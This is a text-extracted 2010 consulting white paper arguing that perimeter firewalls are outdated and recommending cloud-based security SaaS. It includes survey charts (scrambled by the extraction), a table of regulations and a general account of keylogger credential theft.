Escolar Documentos
Profissional Documentos
Cultura Documentos
consulting
October
2010
CLYDE
Beyond the Wall: CONSULTING
Security in a Post-Perimeter World
Walls have served multiple purposes throughout history. The Great Wall of China
defended against invaders, while the Berlin Wall kept citizens from freely traveling
beyond the control of their rulers.
Network security relies on similar premises. For years network security professionals
touted “perimeter security” as the primary solution to keep the bad guys out and
the good guys in. However, just as guns and air attacks overcame protective walls,
changes in malware attacks have rendered network firewalls and perimeter-centric
security an ineffective defense. Simultaneously, the increasingly mobile workforce
makes an on-premise approach even more futile. Walls can no longer keep the bad
guys out, nor can they keep the good guys in.
19,159
74,981
113,081
167,069
708,742
1,691,323
2,895,802
2,500,000
2,000,000
1,500,000
1,000,000
500,000
0
2002 2003 2004 2005 2006 2007 2008 2009 Source: Internet Security Threat Report,
Symantec April 2010
When a keylogger finds its way on to an employee’s laptop while it is outside the wall of the corporate network, it can
gather login information to Customer Resource Management (CRM) and Human Resource (HR) applications. Then
the bad guys don’t need to hack in to steal valuable customer billing data or employee personal data because they have
the keys to open the door. As a result, the market to buy and sell logins and passwords continues to grow.
FIGURE 3
In this case and others like it, the bad guys start by stealing Web site administration credentials from a Web site
administrator who works on a legitimate Web page. This is done using a keylogger. In this case, a keylogger found its
way onto a friend’s laptop and when the Web site administrator used that laptop to login to do his job, his FTP login
credentials were captured and later sold on the black market.
2002 the compromised
After being purchased, 2003 credentials
2004 were inserted2005 2006 program2007
into another malicious 2008
that systematically
3000000
logs into sites, identifies html files with “ index” or “default” in the name and replaces them with another piece of evil
2500000
code that loads a keylogger onto the computer of anyone who visits the Web page.
2000000
FIGURE 4
Keylogger Adding Malware infects users
1500000 malware who visit the site
1000000
500000
Beefmaster
Webmaster
0
Removing
malware
Source: Webroot
While some people may not be aware of specific stories like this one, most do have a general sense that these threats
are real and growing. InformationWeek Analytics’ Strategic Security Survey found that a majority of companies
surveyed expect a security breach in the next year. Among companies with fewer than 1,000 employees, 84 percent
of respondents state that malware is the most likely security breach they will face. Almost half also think a Web or
application exploit will breach security. Respondents to the same survey identified the serious risks associated with
these breaches, such as network or application downtime, and theft of valuable information.
56%
PHISHING
41%
OPERATING
SYSTEM 52%
VULNERABILITIES 48%
AT TACKED
WEB OR
44%
SOF TWARE
APPLICATIONS N/A 2010 2009
EXPLOITED
25%
DENIAL OF
SERVICE 29%
0 20 40 60 80 100
Source: Strategic Security Survey,
InformationWeek Analytics, May 2010
100
IDENTIT Y THEF T 34%
80 LIABILIT Y
LEGAL 34%
0
Malware (viruses,Operating
worms,
Phishing
botnets)
system
Web orvulnerabilities
software applications
attacked
Denial ofexploited
Service
4 Beyond the Wall: Security in a Post-Perimeter World
© 2010 Clyde Consulting, LLC CLYDE
consulting
The Good Guys Are Getting Out
The ever-growing number of assaults via malware and exploits is only part of the challenge facing companies today.
The days of only An even bigger dilemma is protecting corporate data against these assaults in a world of mobile employees.
company issued assets The era of the walled cities didn’t end simply because their ability to protect diminished. Many rulers found that over
time their people refused to live behind a wall. The human desire to not be captive is powerful. Likewise, employees
connecting to the IT want to be free. Free to work from anywhere, and free to use whatever devices they want to access work files and data.
infrastructure are gone. The days of only company issued assets connecting to secure parts of the IT infrastructure are gone.
According to International Data Corp (IDC), more than one billion non-PC mobile devices will access the Internet
in 2010. In-keeping with that trend, IDC reports that “mobility” is cited as the number one factor driving increased
security spending. IT security professionals are realizing how challenging it is to protect employees who are outside
the perimeter.
Regardless of the security challenges associated with mobile workers, employees are committed to working from
outside the perimeter. Recent research sponsored by Unisys and conducted by IDC found that 75 percent of
“information workers” are willing to pay at least part of the cost of IT tools in order to be able to use what they
want. This “consumerization” of IT raises some new and unique concerns for maintaining security and managing
corporate IT infrastructure.
LAPTOP 61%
GPS 38%
TEXT OR IM 47%
PROFESSIONAL 36%
SOCIAL NETWORKS
20 40 60 80 100
0
IDC predicts the percent of workers using smart phones and social networking is expected to double from
approximately 40 percent to almost 80 percent by 2013. In addition to the increased number of consumer devices
accessing company networks, many interactive Web applications are being used via a corporate network connection.
120
100
80 Wall: Security in a Post-Perimeter World
5 Beyond the
© 2010 Clyde Consulting, LLC CLYDE
60 consulting
40
The explosion of Web applications and software-as-a-service (SaaS) means that employees using any Internet
connected device anywhere in the world can access vital business applications with just a login. This trend towards
anywhere-and-everywhere computing is fueling a shift away from software sold as a packaged product. IDC expects
that by 2012, less than 15 percent of new software firms will ever ship a packaged product (CD). Tied to this, IDC
predicts continued growth in the SaaS market. IDC estimates that the SaaS market reached $13.1 billion in revenue
in 2009, and will grow to $40.5 billion by 2014—a compound annual growth rate (CAGR) of just over 25 percent.
TWIT TER
Source: A Consumer Revolution in the
0 20 40 60 80 100
Enterprise by IDC, sponsored by Unisys,
June 2010
This is the post-perimeter world. No longer can an artificial wall separate business and personal use of devices,
Web sites, social networks, and other tools. Businesses need to embrace this new paradigm by:
• providing solid security at the point that users connect to business applications
• ensuring valuable data is protected
• constantly updating device-level protection.
20
0
Web
Email
Shared
Browsing
WebDocs
orText
Audio
IMInternet
Messaging
Google
Internet
Video
Prof.
AppsNetwrking
Phone
Blogs/Wikis
Video Streaming
YouTube
Twitter
GLBA
w h at i t i s w h at i t doe s who it impact s mos t
Gramm-Leach Requires that sensitive information sent across Finance industry
Bliley Act the Internet is encrypted
DPA
w h at i t i s w h at i t doe s who it impact s mos t
Data Protection Protects people’s personal information European companies that
Act of 1998 by imposing legal obligations on anyone handle personal data
processing personal data
SOX
w h at i t i s w h at i t doe s who it impact s mos t
Sarbanes- Protects shareholders and the general public Finance industry, public
Oxley Act from accounting errors and scandals by companies that register
requiring all public companies to retain their shares for sale on a US
email and business records for at least 7 years Stock Exchange
FRCP
w h at i t i s w h at i t doe s who it impact s mos t
Federal Rules of Enforces data retention standards by requiring Any business that may
Civil Procedure companies to produce records within a set become involved in a
amount of time court case
FOIA
w h at i t i s w h at i t doe s who it impact s mos t
Freedom of Gives citizens the right to have copies of any UK and US government
Information Acts information that government or commercial organizations
bodies are holding on them
HIPAA
w h at i t i s w h at i t doe s who it impact s mos t
Health Insurance Ensures the privacy and confidentiality of Healthcare industry
Portability and patients’ healthcare information
Accountability Act
PCI-DSS
w h at i t i s w h at i t doe s who it impact s mos t
Payment Card Enforces global standards to protect credit Anyone that handles
Information Data card data against theft and fraud payment card transactions
Security Standard
CIPA
w h at i t i s w h at i t doe s who it impact s mos t
Children’s Internet Prevents access to offensive Internet content Education industry
Protection Act on school and library computers
Source: Webroot
These well-intentioned efforts can place additional burdens on companies to ensure regulatory compliance in their
approach to information security. Staying ahead of malware attacks and securing a mobile workforce to protect
valuable data and ensure regulatory compliance is a tall order for even the largest IT security department. For many
small- and medium-sized businesses, the challenge often is insurmountable.
The benefits of moving to the cloud are not merely speculative. In a global study, commissioned by Webroot, Web
Security professionals in Australia, the United Kingdom, and the United States identified simplicity, effectiveness, and
blocking access to inappropriate sites as the top three reasons for adopting security SaaS.
The Forrester paper “Real-World Insights into SaaS Implementation Success” summarizes the experiences of clients
who have completed SaaS implementations. The proven SaaS benefits discussed in the report are:
• Speed to deploy
• Responsive service from vendor
• Lower costs
• Faster deployment of latest innovations
• Easy-to-use interfaces
• Security
SaaS vendors are It’s noteworthy that security is included on the list of benefits, given that it often is identified as a top concern for those
considering a SaaS purchase. However, customers who have implemented SaaS affirm that it offers a superior security
doing more to secure option. The Forrester study confirms this:
data than in-house IT “The majority of the customers we interviewed revealed that their SaaS vendors were doing more to secure their data than their
departments could do. own IT departments could do. One reference said, ‘Our greatest fear became our biggest confidence.’”
FIGURE 10
WEB SURFING
FACEBOOK
HOSTED EMAIL
HOSTED EMAIL
T WIT TER T WIT TER
ERP EXTERNAL
CRM STORAGE DEVICES
CONSUMER IT COMPANY COMPUTERS
INFRASTRUCTURE
PERIMETER POST-PERIMETER
Gartner predicts that by 2012, 20 percent of businesses will own no IT assets. According to Gartner, “Several inter-
related trends are driving the movement toward decreased IT hardware assets, such as virtualization, cloud-enabled
services, and employees running personal desktops and notebook systems on corporate networks.” This trend will
Start-up companies also make Virtual Private Networks (VPNs) obsolete.
should be selecting SaaS This means a field-leveling opportunity for smaller companies that want to compete with larger companies. No longer
will they need to invest in a hardware-intensive infrastructure. Start-up companies should be selecting SaaS solutions
solutions instead of instead of shopping for servers. Established small- and medium-sized businesses should retire application software
shopping for servers. along with the server it is housed upon and migrate to a SaaS security solution.
For larger companies, server consolidation efforts can be accelerated to lower overhead. SaaS means they too can gain
efficiencies and eliminate hardware and maintenance costs.
What’s Next?
In the coming years, expect to see virtually every aspect of IT security transition to the cloud. IDC’s “Worldwide
Security SaaS Forecast by Market” details the growth they predict in the various security segments during the next
several years.
$2000M
ENDPOINT SECURIT Y
$1500M
$500M
MESSAGING SECURIT Y
0
2008 2009 2010 2011 2012 2013
Source: IDC March 2010
Companies need to The faster companies adapt to this new post-perimeter world and seek security solutions that do not rely on antivirus
quickly adapt to the new signatures as their primary means of protection, the faster they can secure valuable information.
post-perimeter world. In order to take advantage of this trend companies should seek a security SaaS vendor that provides the following:
1. C
loud-centric solution that offers superior protection for mobile workers. This means it runs primarily in the cloud
while still providing the necessary endpoint protection.
MESSAGING SECURITY
WEB SECURITY
ENDPOINT SECURITY
NETWORK SECURITY
IDENTITY AND
SECURITY
ACCESS AM
2. Scalable cloud service to grow with the business. This will reduce implementation costs and simplify
ongoing management.
3. C
omplete SaaS solution that includes both e-mail and Web protection. This ensures that valuable company
data is secured.
4. I nnovative technical approach based on pro-active protection that is not merely signature-based. This
protects against nearly all attacks, not only the ones for which there are already signatures.
The Great Wall of China and the site of the Berlin Wall are certainly worth a visit, but their utility to protect and
contain has ceased. The day is fast approaching when out-dated network firewalls and extraneous servers can be sent
off to the “Perimeter-Security Museum.”
An Internet security pioneer and innovator, he is credited with the creation of the first commercial intrusion detection system.
He is a Certified Information Security Manager and founding board member of both SAFEcode and the IT-ISAC. In 2010,
Rob received the coveted Joseph J. Wasserman award from the New York Metro Chapter of Information Security Audit and
Control Association.
Sources
Forrester Research IDC, sponsored by Unisys Open Security Foundation’s
Real-World Insights Into A Consumer Revolution Data Loss Database
SaaS Implementation Success In The Enterprise 2009 yearly report
may 2010 june 2010 datalossdb.org